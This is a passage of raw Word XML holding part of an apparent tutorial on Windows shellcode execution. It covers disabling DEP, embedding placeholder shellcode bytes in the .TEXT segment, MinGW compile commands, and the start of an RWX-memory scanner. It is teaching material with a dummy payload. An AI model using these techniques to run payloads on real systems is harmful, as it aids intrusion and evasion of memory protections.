        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown at address 0x00fd1758</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">Referring back to the virtual memory layout of a single process shown above, it is stated that the stack is only marked as RW memory section with regards to DEP. The same problem occurred before with dynamic allocation of heap memory, in which case a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> function (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">) was used to mark the memory section as executable. In this case we’re not using any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> functions, but luckily we can simply disable DEP for the compiled executable by setting the /NXCOMPAT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>:NO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> flag (for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>VisualStudio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> this can be set within the advanced Linker options). The result is happily executing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>.TEXT Segment Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">So far we have achieved code execution within the heap and the stack, which are both not executable by default and therefore we were required to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> functions and disabling DEP respectively to overcome this.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:br/>
        <w:t>We could avoid using such methods with code execution in a memory region that is already marked as executable.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:br/>
        <w:t>A quick reference back to the memory layout above shows that the .TEXT segment is such a memory region.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>The .TEXT segment needs to be executable, because this is the section that contains your executable code, such as your main-function.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:br/>
        <w:t xml:space="preserve">Sounds like a suitable place for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> execution, but how can we place and execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> in this section. We can’t use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> functions to simply move our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> into here, because the .TEXT segment is not writable and we can’t use function pointers as we don’t have a reference in here to point at.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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Windows.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>".byte 0xde,0xad,0xbe,0xef,0x00\n\t"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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ret\n\t"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">To compile this code the GCC compiler is required, due to the use of the “.byte” directive. Luckily there is a GCC compiler contained in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>MinGW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> project and we can easily compile this as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>mingw32-gcc.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Main.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>mingw32-g</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">++.exe -o Main.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">Viewing this in IDA reveals that our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> has been embed into the .TEXT segment (IDA is just a bit more visual than </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> here):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">The defined </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> ‘0xdeadbeef’ has been placed within the assembled code right after the call to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>__main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t>, which is used as initialization routine. As soon as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>__main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> function finishes the initialization our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> is executed right away.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>RWX-Hunter Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">Last, but not least, after using the default executable .TEXT segment for code execution and creating non-default executable memory sections with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> functions and by disabling DEP, there is one last path to go, which is: Searching for memory sections that have already been marked as read (R), write (W) and executable (X) – which i stumbled across reading </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00F07469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>@</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00F07469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>subTee</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> post on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>InstallUtil’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> help-functionality code exec.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5346249A" wp14:editId="44F6FE30">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="Rectangle 1" descr="https://www.contextis.com/en/blog/a-beginners-guide-to-windows-shellcode-execution-techniqu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www.contextis.com/en/blog/a-beginners-guide-to-windows-shellcode-execution-techniqu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APDVL9AIAAB0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254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:lastRenderedPageBreak/>
        <w:t>The basic idea for the RWX-Hunter is running through your processes virtual memory space searching for a memory section that is marked as RWX.</w:t>
      </w:r>
      <w:r w:rsidR="006B5BC7" w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">The attentive reader will now notice that this only fulfils only 1/3 of the defined steps for code execution, that i set up initially, which is: Finding executable memory.  The task of how to get your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> into this memory region and how to direct the code flow to there is not covered with this approach. However, the concept still fits well in this guide and is therefore worth mentioning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>The first question that needs to be answered is the range of where to search for RWX memory sections. Once again referring back to the initial description of a processes private virtual memory space it is stated that a processes memory space spans from 0x00000000 to 0x7FFFFFFFF, so this should be the search range.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>The Code-Snippet, which I’ve ported to C from </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00F07469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>@</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00F07469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>subTee</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00F07469">
        <w:t> C# gist </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00F07469">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F07469">
        <w:t>, to implement this could look like the following (honestly i prefer this in C#, but since all of the above code is in C i stick to consistency):</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MaxAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x7fffffff</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
